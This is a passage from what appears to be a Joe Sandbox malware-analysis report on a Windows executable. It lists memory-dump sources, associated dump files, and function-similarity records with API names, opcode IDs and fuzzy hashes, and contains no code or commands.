                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                        • Instruction ID: 66366597197aa3bfbc06ef897cd253dda5f272010675b4f4aa49dfb94212be02
                                                        • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                        • Instruction Fuzzy Hash: 70119E26F44F0599FB00EF64E8562B873A4FB08B18F800E30DA6D867A4DF3CE1949390
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: memcpy_s
                                                        • String ID:
                                                        • API String ID: 1502251526-0
                                                        • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                        • Instruction ID: 9fef8d7b62e05f84b6306d2eee51e5fd98298a598b72b266d7073853dda84674
                                                        • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                        • Instruction Fuzzy Hash: BAC11577F5968597E724EF1AA04667AF7A1F7A4B85F808174DB4A43784DB3EE800CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise_clrfp
                                                        • String ID:
                                                        • API String ID: 15204871-0
                                                        • Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                        • Instruction ID: da8bcdcb2bd74a6637f06328c46efc17ef9da9b4b101397e32cdd9175da618dc
                                                        • Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                        • Instruction Fuzzy Hash: D3B15877A04B888AEB55EF29C8473687BA0F784F48F148961DB6D837A4CB3BD491D710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                        • Instruction ID: c794b08e58921f17fe0a4e87a9295f607866fa92ecfdbde66990d1a8277f4cd7
                                                        • Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                        • Instruction Fuzzy Hash: 82F0A43AA1C68586F770BF64F45B76AB3A0EB44724F840375D66D066D4DF3CD0089A10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-227171996
                                                        • Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                        • Instruction ID: b4bc0b1f3a4ae2a7e5149e60ca72c57b14af6d9f314290cbad8739ee32b7625a
                                                        • Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                        • Instruction Fuzzy Hash: 14E1D63AA4864B91F768BF25905313DB3A0FF45B48F94427DDA4E07794CF29E851EB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: e+000$gfff
                                                        • API String ID: 0-3030954782
                                                        • Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                        • Instruction ID: ac03daa4e03fa18d4605a5e9ee401597f4b4681ecba019cf5eb188055cfafabb
                                                        • Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                        • Instruction Fuzzy Hash: 7A519B3AB582E952F724BF359803769EB82E748B94F888279CB6847AC5DF3DD0409710
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gfffffff
                                                        • API String ID: 0-1523873471
                                                        • Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                        • Instruction ID: d64f97b0875a531f51f327a73da7b931df947e55881fe8af5d28ee88e0b273e1
                                                        • Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                        • Instruction Fuzzy Hash: 7BA17667A087E996FB21FB29A4027ADBF91AB58B80F448075DE8E47781DE3DE401D311
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: TMP
                                                        • API String ID: 3215553584-3125297090
                                                        • Opcode ID: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
                                                        • Instruction ID: bd1aa13c26b8734b5f1f438f6533a974121ddfda92923f282baf49bccfd622d7
                                                        • Opcode Fuzzy Hash: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
                                                        • Instruction Fuzzy Hash: 3A51A31DF8864A61FA68B726591317AD2916F84FC4FC841BCDD0D877D6EF3CE452A220
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                        • Instruction ID: 3adcb3ef32ca59250c6be8528dc4a775c178d79985b9a7c8f718c0db451b52aa
                                                        • Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                        • Instruction Fuzzy Hash: 92B09228E4BA46D2FB483B116C8721462A47F48B00FD440B8C20D82320DE2C20B56720
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                        • Instruction ID: f677619d4af998a2f0d01e8aa19428f63dcb089ebf41f61e235e10df6e862df1
                                                        • Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                        • Instruction Fuzzy Hash: F9D1D56EA8864B95FB2CBB25804323DA7A1EB05B48F94427DCE0D076D5CF39D845EB60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                        • Instruction ID: f4ead6777af3e059d1e5c2ff9c0ca22531b97a2af60b4132b1115f66f7c7a930
                                                        • Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                        • Instruction Fuzzy Hash: 66C126322141F44BE698FB29E45A47A73E2F7A9349BD5403BEB8747785C63CE404E760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                        • Instruction ID: 21945b0edfe8d4bf512de039d42c3c7bccaff094994b4bd17139e6f3abf71fd4
                                                        • Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                        • Instruction Fuzzy Hash: FCB1AD7A94878E95F769BF28C05227CBBA4E709F48FA40179CA4E47395CF39D441EB20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                        • Instruction ID: fbb73d0714766ef3a766abfdfad35eaa82a2764d557bbcfc5b95a4b3c0958cfc
                                                        • Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                        • Instruction Fuzzy Hash: 15811576A4879956F774FB29948337AAE91FB89790F84427DDA8E03B84CF3CD0009B10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: ab7e5ebbb4588de28f8b7900a022b5bdd2057c01231704dcb8839a6c2496c78a
                                                        • Instruction ID: fd93c2d31394d483449a7ef326b024303b44a33648853fd0494243c47323be37
                                                        • Opcode Fuzzy Hash: ab7e5ebbb4588de28f8b7900a022b5bdd2057c01231704dcb8839a6c2496c78a
                                                        • Instruction Fuzzy Hash: 9F614D26F4C25266F7A4BA39C05323FE691AF40B60F9406B9E61D476D4DE7FE804A720
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                        • Instruction ID: 56301865ffdf448c782d5476c20cb8868fd2887a5add57cd53162ab97e055c4d
                                                        • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                        • Instruction Fuzzy Hash: 9C51A53AA5865E92F738BB29D04223C73A0FB54F58FA44179CE4D07794CB7AE842D750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                        • Instruction ID: 2e06020388891e3bc484804c14609832e1e7c185e5d0e1b4ab35c5fb129bc31d
                                                        • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                        • Instruction Fuzzy Hash: 1251B17EA58A59D2F724BB29C043238B3B0EB84B68F644179CA4C07794DB3AE943D750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                        • Instruction ID: 0d17dca5645f9bbf29731dc2c5a468da9342a8869ad56fd164381d4eae6da692
                                                        • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                        • Instruction Fuzzy Hash: 4451C53EA5865992F724BB28C043678B3A0EB48B58F644179CE5C07794DF3AED43E790
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                        • Instruction ID: 9ddca2390839710f3d3704553a66fb754acc4c5532bbc8cc7f88b603c51b815c
                                                        • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                        • Instruction Fuzzy Hash: 6751B53EA58659D2F724BB29C043338B7A0EB84B59FA44179CE4C17794CB3AE943D750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                        • Instruction ID: a3fcf6c2599aad30e3cd8bd949fbb6da00c259c6a5dfbededb35e33025658c9b
                                                        • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                        • Instruction Fuzzy Hash: 1E51B23AA5865D91F728BB28C043638A7A1EB44B58FA84179CE4C17794CB3AEC42E750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                        • Instruction ID: f9351c202f7e150ba14506f4b81bf6e9d59a41e321b90f5c2f510cb630b0706f
                                                        • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                        • Instruction Fuzzy Hash: D651E47EA5869991F728BB29C043338A3A1EB44B58FB44175CE4C17794CF3AEA43E750
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
